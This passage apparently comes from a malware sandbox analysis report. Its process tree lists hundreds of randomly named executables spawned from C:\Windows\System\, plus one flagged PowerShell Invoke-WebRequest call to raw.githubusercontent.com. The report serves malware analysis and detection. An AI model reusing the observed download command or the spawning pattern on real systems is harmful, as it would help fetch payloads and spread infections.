  C:\Windows\System\mMrRDbA.exe
  2⤵
  PID:10728
- C:\Windows\System\SpZWSzg.exe
  C:\Windows\System\SpZWSzg.exe
  2⤵
  PID:10748
- C:\Windows\System\CkPjmui.exe
  C:\Windows\System\CkPjmui.exe
  2⤵
  PID:10768
- C:\Windows\System\ZvarVWV.exe
  C:\Windows\System\ZvarVWV.exe
  2⤵
  PID:10788
- C:\Windows\System\mZcprPU.exe
  C:\Windows\System\mZcprPU.exe
  2⤵
  PID:10804
- C:\Windows\System\FggdZXj.exe
  C:\Windows\System\FggdZXj.exe
  2⤵
  PID:10820
- C:\Windows\System\HckuliH.exe
  C:\Windows\System\HckuliH.exe
  2⤵
  PID:10840
- C:\Windows\System\uLprAzW.exe
  C:\Windows\System\uLprAzW.exe
  2⤵
  PID:10856
- C:\Windows\System\lfjYJEv.exe
  C:\Windows\System\lfjYJEv.exe
  2⤵
  PID:10876
- C:\Windows\System\zOaJLBQ.exe
  C:\Windows\System\zOaJLBQ.exe
  2⤵
  PID:10896
- C:\Windows\System\GeYKeAM.exe
  C:\Windows\System\GeYKeAM.exe
  2⤵
  PID:10912
- C:\Windows\System\Ngzvxgq.exe
  C:\Windows\System\Ngzvxgq.exe
  2⤵
  PID:10932
- C:\Windows\System\irpSPZa.exe
  C:\Windows\System\irpSPZa.exe
  2⤵
  PID:10952
- C:\Windows\System\gdzbkpj.exe
  C:\Windows\System\gdzbkpj.exe
  2⤵
  PID:10980
- C:\Windows\System\LZViArJ.exe
  C:\Windows\System\LZViArJ.exe
  2⤵
  PID:10996
- C:\Windows\System\yFjcRqQ.exe
  C:\Windows\System\yFjcRqQ.exe
  2⤵
  PID:11016
- C:\Windows\System\xUjcuTr.exe
  C:\Windows\System\xUjcuTr.exe
  2⤵
  PID:11036
- C:\Windows\System\iGYiCdC.exe
  C:\Windows\System\iGYiCdC.exe
  2⤵
  PID:11060
- C:\Windows\System\EyCjZSr.exe
  C:\Windows\System\EyCjZSr.exe
  2⤵
  PID:11076
- C:\Windows\System\jfcDuyM.exe
  C:\Windows\System\jfcDuyM.exe
  2⤵
  PID:11100
- C:\Windows\System\dZPeoGE.exe
  C:\Windows\System\dZPeoGE.exe
  2⤵
  PID:11116
- C:\Windows\System\jWAWzpD.exe
  C:\Windows\System\jWAWzpD.exe
  2⤵
  PID:11136
- C:\Windows\System\pIQjyVa.exe
  C:\Windows\System\pIQjyVa.exe
  2⤵
  PID:11152
- C:\Windows\System\TQxKmzx.exe
  C:\Windows\System\TQxKmzx.exe
  2⤵
  PID:5616
- C:\Windows\System\WSVgvnf.exe
  C:\Windows\System\WSVgvnf.exe
  2⤵
  PID:5704
- C:\Windows\System\LTDUTCC.exe
  C:\Windows\System\LTDUTCC.exe
  2⤵
  PID:5852
- C:\Windows\System\TkZgbQu.exe
  C:\Windows\System\TkZgbQu.exe
  2⤵
  PID:7276
- C:\Windows\System\pmQrlaU.exe
  C:\Windows\System\pmQrlaU.exe
  2⤵
  PID:7316
- C:\Windows\System\IbIMBZG.exe
  C:\Windows\System\IbIMBZG.exe
  2⤵
  PID:9324
- C:\Windows\System\jiPVpMi.exe
  C:\Windows\System\jiPVpMi.exe
  2⤵
  PID:9628
- C:\Windows\System\StdehjM.exe
  C:\Windows\System\StdehjM.exe
  2⤵
  PID:11280
- C:\Windows\System\GMEcamx.exe
  C:\Windows\System\GMEcamx.exe
  2⤵
  PID:11300
- C:\Windows\System\NKAVXIV.exe
  C:\Windows\System\NKAVXIV.exe
  2⤵
  PID:11320
- C:\Windows\System\cAQvBZM.exe
  C:\Windows\System\cAQvBZM.exe
  2⤵
  PID:11340
- C:\Windows\System\uICbFde.exe
  C:\Windows\System\uICbFde.exe
  2⤵
  PID:11360
- C:\Windows\System\ecQhrBw.exe
  C:\Windows\System\ecQhrBw.exe
  2⤵
  PID:11376
- C:\Windows\System\GvVSCby.exe
  C:\Windows\System\GvVSCby.exe
  2⤵
  PID:11392
- C:\Windows\System\nbCqHqu.exe
  C:\Windows\System\nbCqHqu.exe
  2⤵
  PID:11412
- C:\Windows\System\WphMsJB.exe
  C:\Windows\System\WphMsJB.exe
  2⤵
  PID:11432
- C:\Windows\System\aXgefOT.exe
  C:\Windows\System\aXgefOT.exe
  2⤵
  PID:11452
- C:\Windows\System\BvcUZrH.exe
  C:\Windows\System\BvcUZrH.exe
  2⤵
  PID:11468
- C:\Windows\System\TZwQodI.exe
  C:\Windows\System\TZwQodI.exe
  2⤵
  PID:11488
- C:\Windows\System\vqIywwK.exe
  C:\Windows\System\vqIywwK.exe
  2⤵
  PID:11504
- C:\Windows\System\lxxaTMk.exe
  C:\Windows\System\lxxaTMk.exe
  2⤵
  PID:11520
- C:\Windows\System\exGCvne.exe
  C:\Windows\System\exGCvne.exe
  2⤵
  PID:11540
- C:\Windows\System\aQOTfAa.exe
  C:\Windows\System\aQOTfAa.exe
  2⤵
  PID:11560
- C:\Windows\System\ZJwDSPH.exe
  C:\Windows\System\ZJwDSPH.exe
  2⤵
  PID:11580
- C:\Windows\System\JxVcuGQ.exe
  C:\Windows\System\JxVcuGQ.exe
  2⤵
  PID:11596
- C:\Windows\System\cYYKAbX.exe
  C:\Windows\System\cYYKAbX.exe
  2⤵
  PID:11616
- C:\Windows\System\ytihjyM.exe
  C:\Windows\System\ytihjyM.exe
  2⤵
  PID:11636
- C:\Windows\System\dBxlGRM.exe
  C:\Windows\System\dBxlGRM.exe
  2⤵
  PID:11656
- C:\Windows\System\KzZBkne.exe
  C:\Windows\System\KzZBkne.exe
  2⤵
  PID:11676
- C:\Windows\System\dgGRBzn.exe
  C:\Windows\System\dgGRBzn.exe
  2⤵
  PID:11696
- C:\Windows\System\fSKnlVQ.exe
  C:\Windows\System\fSKnlVQ.exe
  2⤵
  PID:11712
- C:\Windows\System\bkZatiA.exe
  C:\Windows\System\bkZatiA.exe
  2⤵
  PID:11752
- C:\Windows\System\KMaBdiL.exe
  C:\Windows\System\KMaBdiL.exe
  2⤵
  PID:11768
- C:\Windows\System\ShpUJnb.exe
  C:\Windows\System\ShpUJnb.exe
  2⤵
  PID:11796
- C:\Windows\System\IEsmecc.exe
  C:\Windows\System\IEsmecc.exe
  2⤵
  PID:11812
- C:\Windows\System\CogLJHO.exe
  C:\Windows\System\CogLJHO.exe
  2⤵
  PID:11828
- C:\Windows\System\NnNLUxT.exe
  C:\Windows\System\NnNLUxT.exe
  2⤵
  PID:11848
- C:\Windows\System\BtNCIkh.exe
  C:\Windows\System\BtNCIkh.exe
  2⤵
  PID:11864
- C:\Windows\System\pFXsVTs.exe
  C:\Windows\System\pFXsVTs.exe
  2⤵
  PID:11880
- C:\Windows\System\cCuCcLM.exe
  C:\Windows\System\cCuCcLM.exe
  2⤵
  PID:11900
- C:\Windows\System\kDZrbBz.exe
  C:\Windows\System\kDZrbBz.exe
  2⤵
  PID:11916
- C:\Windows\System\IIckGfM.exe
  C:\Windows\System\IIckGfM.exe
  2⤵
  PID:11936
- C:\Windows\System\EvMKhyr.exe
  C:\Windows\System\EvMKhyr.exe
  2⤵
  PID:11952
- C:\Windows\System\sbiolkw.exe
  C:\Windows\System\sbiolkw.exe
  2⤵
  PID:11968
- C:\Windows\System\gMihUOS.exe
  C:\Windows\System\gMihUOS.exe
  2⤵
  PID:11988
- C:\Windows\System\xxSdrUy.exe
  C:\Windows\System\xxSdrUy.exe
  2⤵
  PID:12004
- C:\Windows\System\UmhOcZH.exe
  C:\Windows\System\UmhOcZH.exe
  2⤵
  PID:12020
- C:\Windows\System\ggZIEZN.exe
  C:\Windows\System\ggZIEZN.exe
  2⤵
  PID:12056
- C:\Windows\System\JoIKjYQ.exe
  C:\Windows\System\JoIKjYQ.exe
  2⤵
  PID:12080
- C:\Windows\System\EhrmnSR.exe
  C:\Windows\System\EhrmnSR.exe
  2⤵
  PID:12112
- C:\Windows\System\wvbxAok.exe
  C:\Windows\System\wvbxAok.exe
  2⤵
  PID:12136
- C:\Windows\System\yVHtErh.exe
  C:\Windows\System\yVHtErh.exe
  2⤵
  PID:12152
- C:\Windows\System\CipcVUq.exe
  C:\Windows\System\CipcVUq.exe
  2⤵
  PID:12172
- C:\Windows\System\cuyBgtW.exe
  C:\Windows\System\cuyBgtW.exe
  2⤵
  PID:12192
- C:\Windows\System\MhYFfOC.exe
  C:\Windows\System\MhYFfOC.exe
  2⤵
  PID:12208
- C:\Windows\System\PgBfnRJ.exe
  C:\Windows\System\PgBfnRJ.exe
  2⤵
  PID:12232
- C:\Windows\System\rUzCccF.exe
  C:\Windows\System\rUzCccF.exe
  2⤵
  PID:12256
- C:\Windows\System\KKbpfuR.exe
  C:\Windows\System\KKbpfuR.exe
  2⤵
  PID:12272
- C:\Windows\System\ZmYkHas.exe
  C:\Windows\System\ZmYkHas.exe
  2⤵
  PID:4036
- C:\Windows\System\OYNWxsz.exe
  C:\Windows\System\OYNWxsz.exe
  2⤵
  PID:3172
- C:\Windows\System\kXCTSqF.exe
  C:\Windows\System\kXCTSqF.exe
  2⤵
  PID:7796
- C:\Windows\System\esHhxPC.exe
  C:\Windows\System\esHhxPC.exe
  2⤵
  PID:9828
- C:\Windows\System\xbNJwbl.exe
  C:\Windows\System\xbNJwbl.exe
  2⤵
  PID:9864
- C:\Windows\System\iTZvoKb.exe
  C:\Windows\System\iTZvoKb.exe
  2⤵
  PID:8016
- C:\Windows\System\VkEnHLs.exe
  C:\Windows\System\VkEnHLs.exe
  2⤵
  PID:8052
- C:\Windows\System\rxfzugn.exe
  C:\Windows\System\rxfzugn.exe
  2⤵
  PID:10028
- C:\Windows\System\TBLsOrk.exe
  C:\Windows\System\TBLsOrk.exe
  2⤵
  PID:6836
- C:\Windows\System\rkMybfN.exe
  C:\Windows\System\rkMybfN.exe
  2⤵
  PID:10100
- C:\Windows\System\hYasFzV.exe
  C:\Windows\System\hYasFzV.exe
  2⤵
  PID:10120
- C:\Windows\System\TUGUBgi.exe
  C:\Windows\System\TUGUBgi.exe
  2⤵
  PID:10144
- C:\Windows\System\dtDDYwa.exe
  C:\Windows\System\dtDDYwa.exe
  2⤵
  PID:10180
- C:\Windows\System\oPmpUQd.exe
  C:\Windows\System\oPmpUQd.exe
  2⤵
  PID:8208
- C:\Windows\System\jvwNztd.exe
  C:\Windows\System\jvwNztd.exe
  2⤵
  PID:7396
- C:\Windows\System\jKZvEBL.exe
  C:\Windows\System\jKZvEBL.exe
  2⤵
  PID:8228
- C:\Windows\System\StOJMTL.exe
  C:\Windows\System\StOJMTL.exe
  2⤵
  PID:7532
- C:\Windows\System\RjFmNMK.exe
  C:\Windows\System\RjFmNMK.exe
  2⤵
  PID:8400
- C:\Windows\System\OWlyNyE.exe
  C:\Windows\System\OWlyNyE.exe
  2⤵
  PID:8456
- C:\Windows\System\XTppZeD.exe
  C:\Windows\System\XTppZeD.exe
  2⤵
  PID:8376
- C:\Windows\System\hBIlsxA.exe
  C:\Windows\System\hBIlsxA.exe
  2⤵
  PID:7616
- C:\Windows\System\yQosTvj.exe
  C:\Windows\System\yQosTvj.exe
  2⤵
  PID:7604
- C:\Windows\System\VEAPTgC.exe
  C:\Windows\System\VEAPTgC.exe
  2⤵
  PID:8568
- C:\Windows\System\CmmnCsZ.exe
  C:\Windows\System\CmmnCsZ.exe
  2⤵
  PID:7784
- C:\Windows\System\wrGDnVr.exe
  C:\Windows\System\wrGDnVr.exe
  2⤵
  PID:6416
- C:\Windows\System\VDhBVVK.exe
  C:\Windows\System\VDhBVVK.exe
  2⤵
  PID:7888
- C:\Windows\System\ZqTVeEA.exe
  C:\Windows\System\ZqTVeEA.exe
  2⤵
  PID:7976
- C:\Windows\System\IGvGszz.exe
  C:\Windows\System\IGvGszz.exe
  2⤵
  PID:7064
- C:\Windows\System\ZauhxAs.exe
  C:\Windows\System\ZauhxAs.exe
  2⤵
  PID:7032
- C:\Windows\System\htljzmu.exe
  C:\Windows\System\htljzmu.exe
  2⤵
  PID:7112
- C:\Windows\System\ENIufTx.exe
  C:\Windows\System\ENIufTx.exe
  2⤵
  PID:7148
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:9620
- C:\Windows\System\eCpZuIH.exe
  C:\Windows\System\eCpZuIH.exe
  2⤵
  PID:448
- C:\Windows\System\UwRcFkq.exe
  C:\Windows\System\UwRcFkq.exe
  2⤵
  PID:8816
- C:\Windows\System\mHNSznJ.exe
  C:\Windows\System\mHNSznJ.exe
  2⤵
  PID:9148
- C:\Windows\System\wIhApxy.exe
  C:\Windows\System\wIhApxy.exe
  2⤵
  PID:10272
- C:\Windows\System\kLIPEaA.exe
  C:\Windows\System\kLIPEaA.exe
  2⤵
  PID:10308
- C:\Windows\System\dSDAHMX.exe
  C:\Windows\System\dSDAHMX.exe
  2⤵
  PID:10324
- C:\Windows\System\rZKrPbS.exe
  C:\Windows\System\rZKrPbS.exe
  2⤵
  PID:3180
- C:\Windows\System\MECwjDU.exe
  C:\Windows\System\MECwjDU.exe
  2⤵
  PID:6000
- C:\Windows\System\himvmyO.exe
  C:\Windows\System\himvmyO.exe
  2⤵
  PID:10744
- C:\Windows\System\dXOxPOR.exe
  C:\Windows\System\dXOxPOR.exe
  2⤵
  PID:10812
- C:\Windows\System\kphZcZd.exe
  C:\Windows\System\kphZcZd.exe
  2⤵
  PID:6624
- C:\Windows\System\IcmmkGk.exe
  C:\Windows\System\IcmmkGk.exe
  2⤵
  PID:10828
- C:\Windows\System\QtCPQfh.exe
  C:\Windows\System\QtCPQfh.exe
  2⤵
  PID:7296
- C:\Windows\System\OyxzTys.exe
  C:\Windows\System\OyxzTys.exe
  2⤵
  PID:9292
- C:\Windows\System\ORpsRKf.exe
  C:\Windows\System\ORpsRKf.exe
  2⤵
  PID:9404
- C:\Windows\System\PnIYfWn.exe
  C:\Windows\System\PnIYfWn.exe
  2⤵
  PID:7544
- C:\Windows\System\rIfIkAw.exe
  C:\Windows\System\rIfIkAw.exe
  2⤵
  PID:9460
- C:\Windows\System\BmqCPsj.exe
  C:\Windows\System\BmqCPsj.exe
  2⤵
  PID:7632
- C:\Windows\System\jGzJmbB.exe
  C:\Windows\System\jGzJmbB.exe
  2⤵
  PID:11460
- C:\Windows\System\FbJRoxx.exe
  C:\Windows\System\FbJRoxx.exe
  2⤵
  PID:11648
- C:\Windows\System\jyfMwxV.exe
  C:\Windows\System\jyfMwxV.exe
  2⤵
  PID:7920
- C:\Windows\System\TswgiRD.exe
  C:\Windows\System\TswgiRD.exe
  2⤵
  PID:7944
- C:\Windows\System\rOQkfbk.exe
  C:\Windows\System\rOQkfbk.exe
  2⤵
  PID:11704
- C:\Windows\System\vBVmUiZ.exe
  C:\Windows\System\vBVmUiZ.exe
  2⤵
  PID:11872
- C:\Windows\System\nOVxnpz.exe
  C:\Windows\System\nOVxnpz.exe
  2⤵
  PID:11944
- C:\Windows\System\qtnLdOF.exe
  C:\Windows\System\qtnLdOF.exe
  2⤵
  PID:11984
- C:\Windows\System\qsOYnjR.exe
  C:\Windows\System\qsOYnjR.exe
  2⤵
  PID:9876
- C:\Windows\System\GpbsQgS.exe
  C:\Windows\System\GpbsQgS.exe
  2⤵
  PID:9972
- C:\Windows\System\NCaqtFY.exe
  C:\Windows\System\NCaqtFY.exe
  2⤵
  PID:12072
- C:\Windows\System\EiProyo.exe
  C:\Windows\System\EiProyo.exe
  2⤵
  PID:4020
- C:\Windows\System\lwzWGmm.exe
  C:\Windows\System\lwzWGmm.exe
  2⤵
  PID:6740
- C:\Windows\System\wqoMZMi.exe
  C:\Windows\System\wqoMZMi.exe
  2⤵
  PID:12092
- C:\Windows\System\fhVrKfS.exe
  C:\Windows\System\fhVrKfS.exe
  2⤵
  PID:8608
- C:\Windows\System\THjNsoj.exe
  C:\Windows\System\THjNsoj.exe
  2⤵
  PID:7708
- C:\Windows\System\fytJojO.exe
  C:\Windows\System\fytJojO.exe
  2⤵
  PID:12144
- C:\Windows\System\CizWhMY.exe
  C:\Windows\System\CizWhMY.exe
  2⤵
  PID:12184
- C:\Windows\System\KJuaZDG.exe
  C:\Windows\System\KJuaZDG.exe
  2⤵
  PID:6400
- C:\Windows\System\iADFLXG.exe
  C:\Windows\System\iADFLXG.exe
  2⤵
  PID:12228
- C:\Windows\System\eTBtKzd.exe
  C:\Windows\System\eTBtKzd.exe
  2⤵
  PID:6528
- C:\Windows\System\PQgctwn.exe
  C:\Windows\System\PQgctwn.exe
  2⤵
  PID:8968
- C:\Windows\System\rdNDJCy.exe
  C:\Windows\System\rdNDJCy.exe
  2⤵
  PID:11912
- C:\Windows\System\LdCKuTK.exe
  C:\Windows\System\LdCKuTK.exe
  2⤵
  PID:7132
- C:\Windows\System\wPDWJwB.exe
  C:\Windows\System\wPDWJwB.exe
  2⤵
  PID:11552
- C:\Windows\System\sMFtnjP.exe
  C:\Windows\System\sMFtnjP.exe
  2⤵
  PID:11592
- C:\Windows\System\ksZRVqS.exe
  C:\Windows\System\ksZRVqS.exe
  2⤵
  PID:11736
- C:\Windows\System\gFSOYqc.exe
  C:\Windows\System\gFSOYqc.exe
  2⤵
  PID:11780
- C:\Windows\System\iZeKQqR.exe
  C:\Windows\System\iZeKQqR.exe
  2⤵
  PID:11840
- C:\Windows\System\yEEaEHO.exe
  C:\Windows\System\yEEaEHO.exe
  2⤵
  PID:9388
- C:\Windows\System\LSPFHvD.exe
  C:\Windows\System\LSPFHvD.exe
  2⤵
  PID:8836
- C:\Windows\System\IRbBAHz.exe
  C:\Windows\System\IRbBAHz.exe
  2⤵
  PID:3176
- C:\Windows\System\zbqiDaX.exe
  C:\Windows\System\zbqiDaX.exe
  2⤵
  PID:12352
- C:\Windows\System\QydFPYF.exe
  C:\Windows\System\QydFPYF.exe
  2⤵
  PID:4300
- C:\Windows\System\ijwBzeS.exe
  C:\Windows\System\ijwBzeS.exe
  2⤵
  PID:12412
- C:\Windows\System\OOiaorg.exe
  C:\Windows\System\OOiaorg.exe
  2⤵
  PID:3732
- C:\Windows\System\YavnkYh.exe
  C:\Windows\System\YavnkYh.exe
  2⤵
  PID:11044
- C:\Windows\System\puqbVIT.exe
  C:\Windows\System\puqbVIT.exe
  2⤵
  PID:12332
- C:\Windows\System\LJuqTty.exe
  C:\Windows\System\LJuqTty.exe
  2⤵
  PID:12940
- C:\Windows\System\lfobpqP.exe
  C:\Windows\System\lfobpqP.exe
  2⤵
  PID:3944
- C:\Windows\System\rQycPcP.exe
  C:\Windows\System\rQycPcP.exe
  2⤵
  PID:13304
- C:\Windows\System\hOtHpka.exe
  C:\Windows\System\hOtHpka.exe
  2⤵
  PID:13136
- C:\Windows\System\HGkQUjq.exe
  C:\Windows\System\HGkQUjq.exe
  2⤵
  PID:4068
- C:\Windows\System\wTgoxbw.exe
  C:\Windows\System\wTgoxbw.exe
  2⤵
  PID:13160
- C:\Windows\System\hFETRqn.exe
  C:\Windows\System\hFETRqn.exe
  2⤵
  PID:4740
- C:\Windows\System\KCohLcw.exe
  C:\Windows\System\KCohLcw.exe
  2⤵
  PID:13244
- C:\Windows\System\TyBIRLj.exe
  C:\Windows\System\TyBIRLj.exe
  2⤵
  PID:1936
- C:\Windows\System\zbnviCb.exe
  C:\Windows\System\zbnviCb.exe
  2⤵
  PID:9512
- C:\Windows\System\OvHSHpp.exe
  C:\Windows\System\OvHSHpp.exe
  2⤵
  PID:3772
- C:\Windows\System\GQaVhOM.exe
  C:\Windows\System\GQaVhOM.exe
  2⤵
  PID:2408
- C:\Windows\System\qLjoGpH.exe
  C:\Windows\System\qLjoGpH.exe
  2⤵
  PID:13192
- C:\Windows\System\PjrOIGu.exe
  C:\Windows\System\PjrOIGu.exe
  2⤵
  PID:12820
- C:\Windows\System\cdjziIX.exe
  C:\Windows\System\cdjziIX.exe
  2⤵
  PID:12612
- C:\Windows\System\usBbIww.exe
  C:\Windows\System\usBbIww.exe
  2⤵
  PID:11024
- C:\Windows\System\bqamEfp.exe
  C:\Windows\System\bqamEfp.exe
  2⤵
  PID:4120
- C:\Windows\System\ScoCMns.exe
  C:\Windows\System\ScoCMns.exe
  2⤵
  PID:12836
- C:\Windows\System\LaPfLNn.exe
  C:\Windows\System\LaPfLNn.exe
  2⤵
  PID:9004
- C:\Windows\System\tqHdmDt.exe
  C:\Windows\System\tqHdmDt.exe
  2⤵
  PID:13316
- C:\Windows\System\apqbsdi.exe
  C:\Windows\System\apqbsdi.exe
  2⤵
  PID:13336
- C:\Windows\System\vyicAxk.exe
  C:\Windows\System\vyicAxk.exe
  2⤵
  PID:13352
- C:\Windows\System\jrxWzIJ.exe
  C:\Windows\System\jrxWzIJ.exe
  2⤵
  PID:13464
- C:\Windows\System\bSrkhdi.exe
  C:\Windows\System\bSrkhdi.exe
  2⤵
  PID:13484
- C:\Windows\System\YoMCHJW.exe
  C:\Windows\System\YoMCHJW.exe
  2⤵
  PID:13500
- C:\Windows\System\GPmnHpD.exe
  C:\Windows\System\GPmnHpD.exe
  2⤵
  PID:13520
- C:\Windows\System\oCUTSCe.exe
  C:\Windows\System\oCUTSCe.exe
  2⤵
  PID:13536
- C:\Windows\System\CAAvVsw.exe
  C:\Windows\System\CAAvVsw.exe
  2⤵
  PID:13568
- C:\Windows\System\aFJguGe.exe
  C:\Windows\System\aFJguGe.exe
  2⤵
  PID:13596
- C:\Windows\System\vLNajeY.exe
  C:\Windows\System\vLNajeY.exe
  2⤵
  PID:13612
- C:\Windows\System\SkCBeoK.exe
  C:\Windows\System\SkCBeoK.exe
  2⤵
  PID:13628
- C:\Windows\System\RChThHK.exe
  C:\Windows\System\RChThHK.exe
  2⤵
  PID:13656
- C:\Windows\System\obStFmi.exe
  C:\Windows\System\obStFmi.exe
  2⤵
  PID:13672
- C:\Windows\System\hfWVGlt.exe
  C:\Windows\System\hfWVGlt.exe
  2⤵
  PID:13688
- C:\Windows\System\vzBJytK.exe
  C:\Windows\System\vzBJytK.exe
  2⤵
  PID:13704
- C:\Windows\System\xnQhkle.exe
  C:\Windows\System\xnQhkle.exe
  2⤵
  PID:13724
- C:\Windows\System\JDfkUKo.exe
  C:\Windows\System\JDfkUKo.exe
  2⤵
  PID:13740
- C:\Windows\System\RFuMtuI.exe
  C:\Windows\System\RFuMtuI.exe
  2⤵
  PID:13760
- C:\Windows\System\wAYrtYI.exe
  C:\Windows\System\wAYrtYI.exe
  2⤵
  PID:13776
- C:\Windows\System\bdGZuca.exe
  C:\Windows\System\bdGZuca.exe
  2⤵
  PID:13796
- C:\Windows\System\vBLouPB.exe
  C:\Windows\System\vBLouPB.exe
  2⤵
  PID:13816
- C:\Windows\System\xUYZHTq.exe
  C:\Windows\System\xUYZHTq.exe
  2⤵
  PID:13832
- C:\Windows\System\TwpHlcI.exe
  C:\Windows\System\TwpHlcI.exe
  2⤵
  PID:13848
- C:\Windows\System\IsZqipY.exe
  C:\Windows\System\IsZqipY.exe
  2⤵
  PID:13864
- C:\Windows\System\ZFWlmUx.exe
  C:\Windows\System\ZFWlmUx.exe
  2⤵
  PID:13884
- C:\Windows\System\aUAhgOJ.exe
  C:\Windows\System\aUAhgOJ.exe
  2⤵
  PID:13900
- C:\Windows\System\CrjELrN.exe
  C:\Windows\System\CrjELrN.exe
  2⤵
  PID:13916
- C:\Windows\System\hyWslmk.exe
  C:\Windows\System\hyWslmk.exe
  2⤵
  PID:13940
- C:\Windows\System\jEkRwKT.exe
  C:\Windows\System\jEkRwKT.exe
  2⤵
  PID:13956
- C:\Windows\System\rreCLIQ.exe
  C:\Windows\System\rreCLIQ.exe
  2⤵
  PID:13976
- C:\Windows\System\udOChWx.exe
  C:\Windows\System\udOChWx.exe
  2⤵
  PID:13996
- C:\Windows\System\CYnLiah.exe
  C:\Windows\System\CYnLiah.exe
  2⤵
  PID:14012
- C:\Windows\System\uHHYQQO.exe
  C:\Windows\System\uHHYQQO.exe
  2⤵
  PID:14060
- C:\Windows\System\xbLGTBC.exe
  C:\Windows\System\xbLGTBC.exe
  2⤵
  PID:14076
- C:\Windows\System\hzqqpRa.exe
  C:\Windows\System\hzqqpRa.exe
  2⤵
  PID:14096
- C:\Windows\System\rPdSCKQ.exe
  C:\Windows\System\rPdSCKQ.exe
  2⤵
  PID:14112
- C:\Windows\System\DyJVGVg.exe
  C:\Windows\System\DyJVGVg.exe
  2⤵
  PID:14132
- C:\Windows\System\bMZAQci.exe
  C:\Windows\System\bMZAQci.exe
  2⤵
  PID:14156
- C:\Windows\System\iiRLlMe.exe
  C:\Windows\System\iiRLlMe.exe
  2⤵
  PID:14176
- C:\Windows\System\hKojmwG.exe
  C:\Windows\System\hKojmwG.exe
  2⤵
  PID:14192
- C:\Windows\System\WeDsVjf.exe
  C:\Windows\System\WeDsVjf.exe
  2⤵
  PID:14208
- C:\Windows\System\YlJSubd.exe
  C:\Windows\System\YlJSubd.exe
  2⤵
  PID:14228
- C:\Windows\System\wjbPsie.exe
  C:\Windows\System\wjbPsie.exe
  2⤵
  PID:14248
- C:\Windows\System\kcKNkjM.exe
  C:\Windows\System\kcKNkjM.exe
  2⤵
  PID:14264
- C:\Windows\System\brxsOnX.exe
  C:\Windows\System\brxsOnX.exe
  2⤵
  PID:14280
- C:\Windows\System\VsmlPps.exe
  C:\Windows\System\VsmlPps.exe
  2⤵
  PID:14300
- C:\Windows\System\UzZBGaL.exe
  C:\Windows\System\UzZBGaL.exe
  2⤵
  PID:14320
- C:\Windows\System\sUBdSJw.exe
  C:\Windows\System\sUBdSJw.exe
  2⤵
  PID:13060
- C:\Windows\System\RUTqXsu.exe
  C:\Windows\System\RUTqXsu.exe
  2⤵
  PID:11336
- C:\Windows\System\nBIpDwl.exe
  C:\Windows\System\nBIpDwl.exe
  2⤵
  PID:208
- C:\Windows\System\AJRBJlC.exe
  C:\Windows\System\AJRBJlC.exe
  2⤵
  PID:9480
- C:\Windows\System\hjnsdlw.exe
  C:\Windows\System\hjnsdlw.exe
  2⤵
  PID:9924
- C:\Windows\System\omGFDlm.exe
  C:\Windows\System\omGFDlm.exe
  2⤵
  PID:8640
- C:\Windows\System\FCrHvyj.exe
  C:\Windows\System\FCrHvyj.exe
  2⤵
  PID:12368
- C:\Windows\System\WSrzYey.exe
  C:\Windows\System\WSrzYey.exe
  2⤵
  PID:12388
- C:\Windows\System\wwMrzOm.exe
  C:\Windows\System\wwMrzOm.exe
  2⤵
  PID:9804
- C:\Windows\System\MNlgoHP.exe
  C:\Windows\System\MNlgoHP.exe
  2⤵
  PID:7704
- C:\Windows\System\ZeZIQIU.exe
  C:\Windows\System\ZeZIQIU.exe
  2⤵
  PID:11032
- C:\Windows\System\hAaUQdV.exe
  C:\Windows\System\hAaUQdV.exe
  2⤵
  PID:12620
- C:\Windows\System\TdVwXFo.exe
  C:\Windows\System\TdVwXFo.exe
  2⤵
  PID:2232
- C:\Windows\System\KvKmNQZ.exe
  C:\Windows\System\KvKmNQZ.exe
  2⤵
  PID:12640
- C:\Windows\System\InMmrqo.exe
  C:\Windows\System\InMmrqo.exe
  2⤵
  PID:12568
- C:\Windows\System\cVRvklL.exe
  C:\Windows\System\cVRvklL.exe
  2⤵
  PID:12744
- C:\Windows\System\ttzqfEv.exe
  C:\Windows\System\ttzqfEv.exe
  2⤵
  PID:5004
- C:\Windows\System\NUPvNAq.exe
  C:\Windows\System\NUPvNAq.exe
  2⤵
  PID:5028
- C:\Windows\System\IYQSYNY.exe
  C:\Windows\System\IYQSYNY.exe
  2⤵
  PID:5312
- C:\Windows\System\tSfnPaE.exe
  C:\Windows\System\tSfnPaE.exe
  2⤵
  PID:10624
- C:\Windows\System\DeULyiF.exe
  C:\Windows\System\DeULyiF.exe
  2⤵
  PID:13096
- C:\Windows\System\aJODYsD.exe
  C:\Windows\System\aJODYsD.exe
  2⤵
  PID:13332
- C:\Windows\System\sJCuMkT.exe
  C:\Windows\System\sJCuMkT.exe
  2⤵
  PID:6024
- C:\Windows\System\bPIvFff.exe
  C:\Windows\System\bPIvFff.exe
  2⤵
  PID:13408
- C:\Windows\System\xEiuKuZ.exe
  C:\Windows\System\xEiuKuZ.exe
  2⤵
  PID:13424
- C:\Windows\System\rUZhRCB.exe
  C:\Windows\System\rUZhRCB.exe
  2⤵
  PID:13440
- C:\Windows\System\uSdejID.exe
  C:\Windows\System\uSdejID.exe
  2⤵
  PID:10664
- C:\Windows\System\bQCAtuM.exe
  C:\Windows\System\bQCAtuM.exe
  2⤵
  PID:13772
- C:\Windows\System\IczKDTS.exe
  C:\Windows\System\IczKDTS.exe
  2⤵
  PID:13824
- C:\Windows\System\QVdSVVz.exe
  C:\Windows\System\QVdSVVz.exe
  2⤵
  PID:7676
- C:\Windows\System\WbFlzGU.exe
  C:\Windows\System\WbFlzGU.exe
  2⤵
  PID:13876
- C:\Windows\System\aPxyQtJ.exe
  C:\Windows\System\aPxyQtJ.exe
  2⤵
  PID:8684
- C:\Windows\System\dhdmjqT.exe
  C:\Windows\System\dhdmjqT.exe
  2⤵
  PID:4376
- C:\Windows\System\VpocVWx.exe
  C:\Windows\System\VpocVWx.exe
  2⤵
  PID:3508
- C:\Windows\System\mZbiTyG.exe
  C:\Windows\System\mZbiTyG.exe
  2⤵
  PID:9680
- C:\Windows\System\zwfIfPt.exe
  C:\Windows\System\zwfIfPt.exe
  2⤵
  PID:3000
- C:\Windows\System\jaQGPiP.exe
  C:\Windows\System\jaQGPiP.exe
  2⤵
  PID:13384
- C:\Windows\System\bqfYCRi.exe
  C:\Windows\System\bqfYCRi.exe
  2⤵
  PID:10796
- C:\Windows\System\dZYeZrS.exe
  C:\Windows\System\dZYeZrS.exe
  2⤵
  PID:11372
